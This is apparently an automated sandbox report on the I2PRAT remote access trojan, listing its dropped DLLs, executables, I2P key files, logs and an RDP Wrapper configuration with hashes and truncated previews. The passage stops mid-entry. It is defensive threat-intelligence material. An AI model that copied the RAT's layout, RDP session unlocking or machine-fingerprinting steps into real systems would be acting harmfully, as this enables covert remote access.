Preview:	..:..U<..7..m....(@...h.R..@.!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t.a..?N.[.....+.....q>...4..h.a[...........W..............NTCP2.@.caps=.4;.s=,-AVywzMEFpnwv~fS9X~BC76tg4Sk5Mb3238xTJLA5jU=;.v=.2;..........SSU2.q.caps=.4;.i=,~QHa9hi0TljRyJUAjCqA6LN84Mx-Ao9fJqs2p1M3SGI=;.s=,eUI9J8LqidvcKjwgIM0dDdjrgpK1U3HtLqvVwEkdGjw=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;T.AB.L.v..e....>...".U.....7. ....[V..D.tJ."hO..{,..d..A......

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	455
Entropy (8bit):	6.040793856996376
Encrypted:	false
SSDEEP:	12:RrSpomISpomISpomISpomISpomISpomISpomISpomISpomISpfSJ2s:g7L7L7L7L7L7L7L7L7LKYs
MD5:	6E371672F769CDC4E6C6B646C49479EA
SHA1:	9ACADBFFD73C123083BADAF90B74B3EB21ECAA4E
SHA-256:	A51BD1EFA33708785F3FD05B0307B9F00AF6ACAC123D2EBBB956E25FFE218DAB
SHA-512:	8F34B38DDCDF60126E573876AA6ED9DFC7B7FB0CF8486F06257BBA7ADDFB23C4BBF135FDC274D0D543B1C87A5C9E71CD18CE0B3C6D371AC9FD702C6BB90D5D38
Malicious:	false
Preview:	..:..U<..7..m....(@...h.R..@.!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t.a..?N.[.....+.....q>...4..h.a[.............'.e<.Jw../.L...k..,%.o.'.......Q.....s.....e..r...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ssu2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	96
Entropy (8bit):	6.181265755906957
Encrypted:	false
SSDEEP:	3:ASO3QimEcXh4Olf608+Y4r9dPlEtbBD51:ASKQfuOli084rWtBr
MD5:	8CFE522CFBAADD1BDAE52A55334156F2
SHA1:	C9E962BE36800222D8B77793D0002F883C175E17
SHA-256:	B02FD44CF65EBC03946941295A5D7D5550278D561B57935BED3C6DCECA47A4BF
SHA-512:	F17830519FFB31B500A9656D1F940191D7AE6B8CBE2E8E4B6CA4C060DB40D8B0B8E77486CFE68F14BDCD5219474F531A4E878FF8923E5B8224042D095FD1739F
Malicious:	false
Preview:	yB='....< ......Sq.....I..<..&H'<.a...q.2.]-.....LJ.....[......NX......\|..~.._&.6.S7Hb

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	6.205377670389132
Encrypted:	false
SSDEEP:	768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
MD5:	BB070CFBD23A7BC6F2A0F8F6D167D207
SHA1:	BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
SHA-256:	C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
SHA-512:	93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*.....X.................@....................................-.....`... .................................................P............`..X............................................B..(....................................................text...X...........................`..`.data...............................@....rdata...Q.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4672
Entropy (8bit):	5.35032008495527
Encrypted:	false
SSDEEP:	96:idHwWYJ9VXyHzHH0H20HaSHpmHu5SHSPmHSm5SHWmHOn5SH5SHYEmHX5SHvmHH5I:AziTCTn0W06SgO5S7z5SJc5SZSo35SOG
MD5:	CED2EC929C422734A983E047CED7F4CF
SHA1:	7B433E6EB57FFEBA5CF2A8EB576B7D7BC976D597
SHA-256:	38EA1EEC189B588743210552E8C7B85CD5A50984D146A3FB64B2C3F735092968
SHA-512:	72FED0733DA6E9C63CC832EBDA8C4A2D7FFA7A9DE684B5DB7A18B71EB64D7AD4DAF0A7010079437E07FAE758F21410548E1D5E32A1FD56FF02C39393F529F171
Malicious:	true
Yara Hits:	Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, Author: Joe Security
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl

Download File

Process:	C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
File Type:	data
Category:	dropped
Size (bytes):	456
Entropy (8bit):	3.2341395630162877
Encrypted:	false
SSDEEP:	12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
MD5:	40AB00517F4227F2C3C334F1D16B65B4
SHA1:	F8D57AF017E2209B4FB24122647FD7F71B67C87C
SHA-256:	4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
SHA-512:	75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
Malicious:	false
Preview:	C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.285421743969757
Encrypted:	false
SSDEEP:	1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
MD5:	6E01ED70D02CE47F4D27762A9E949DEE
SHA1:	32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
SHA-256:	EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
SHA-512:	B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1167
Entropy (8bit):	5.4988598459278535
Encrypted:	false
SSDEEP:	24:CFAGHr5lGyclY7Gfy6BgT7cRE9FLxJDJF0ERNuSXYjHeAOp:CFdHr54yclDYcm9FL/fT6eD
MD5:	2D505AA09A8141D8EFF7E75F623B4A5C
SHA1:	39FB13C9B7F951970F9D6E417125FBFC961B2327
SHA-256:	23A3CF66E882B60662A2582BCD5416088C70553AB9F2594658D8907E52293583
SHA-512:	8EBACB5886940C5BD150FACAD5FFB4D1916B03F82A37B42B330E1F3C2951BE11B92F66D3EE6BFC5EFD7FB0464865FAEB637B60A1502EE5CD9DF739704873B945
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe1171a8a0)..[I] (tcp_connect) -> Done(sock=0x38c,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129536
Entropy (8bit):	6.2852879161990645
Encrypted:	false
SSDEEP:	1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
MD5:	88E6178B0CD434C8D14710355E78E691
SHA1:	F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
SHA-256:	7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
SHA-512:	C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."....<..........Y.........,...................................../....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	5.494442993041193
Encrypted:	false
SSDEEP:	24:CFAGH75lGyclY7Gfy6BgT7cRE9FLxJDJF0dk1RDolXYLYcRAENmMeAOp:CFdH754yclDYcm9FL/fAvcLMMeD
MD5:	3F81E8EB023B4D8C031B871BB7A3ACDD
SHA1:	D9DB32522C317DE2D1BDA79741713693D1E12BC7
SHA-256:	781F8413084B05DC9E675C7C3C846E6FAD6D734F5D0EEB283FF400D03517FB4E
SHA-512:	1415EAEE5E8F800B4FDFB7F3B70B2F3352B9A79CAE7A668C6E70BC0E1203D52C9A5D0766A165FE4F1F202ACF96D673FAD00C10DC3AC4CFB8BEC1385ED3F13959
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe116f

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\referrer

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9:9
MD5:	006F29D8E822B9241020AEC2495EF819
SHA1:	6510BEB08A14B6BCC74D32031C1B19AA07169CF1
SHA-256:	69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
SHA-512:	16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
Malicious:	false
Preview:	wgNj

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.25860377459178
Encrypted:	false
SSDEEP:	1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
MD5:	BD1D98C35FE2CB3E14A655AEDE9D4B01
SHA1:	49361C09F5A75A4E2D6E85FBDA337FC521770793
SHA-256:	961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
SHA-512:	74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1926
Entropy (8bit):	5.474986778744701
Encrypted:	false
SSDEEP:	48:CFdHr+54yclDYcm9FL/frr5ZR5+sR5HR5ikfP5OKXbeD:idHxNYJ9VXUD
MD5:	3D0F569F9B4563DEC524E3E2445FBFCF
SHA1:	151EB865ABC3178D4FEF17926A1595FCEB8CBFDC
SHA-256:	57E18819A575660BAB9BB234A0B1D1113F196DFBE0572AFFFA6093CE6895A3C3
SHA-512:	438FC132CC9F62D665A04CB47A431315E1968824C8B56EE420C82C1C99ED12F7AA8DA11A05EB8B04ADB18191FE84947209217FC3914151015E775B0C16FA5BB8
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe116be342)..[I] (tcp_connect) -

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2041507656664825
Encrypted:	false
SSDEEP:	1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
MD5:	CB4F460CF2921FCD35AC53F4154FCBE0
SHA1:	AFD91433EF0C03315739FB754B16D6C49D2E51F2
SHA-256:	D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
SHA-512:	BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	456534
Entropy (8bit):	5.450314708570292
Encrypted:	false
SSDEEP:	1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
MD5:	AC8B2EA4A310D6748A8845C235A3CDC8
SHA1:	0B489969C7D95411E4104B9BB952C0024EDE1616
SHA-256:	77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
SHA-512:	0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg

Download File

Process:	C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
File Type:	data
Category:	dropped
Size (bytes):	10480965
Entropy (8bit):	6.710750822103746
Encrypted:	false
SSDEEP:	196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
MD5:	458F2D710689EA3CF61D5CD97C6B2470
SHA1:	BA71901A29F77715A3DC952578F6D249B944FE26
SHA-256:	47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
SHA-512:	C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
Malicious:	true
Yara Hits:	Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg, Author: Joe Security
Preview:	.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f.................@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0y30hzar.ioa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
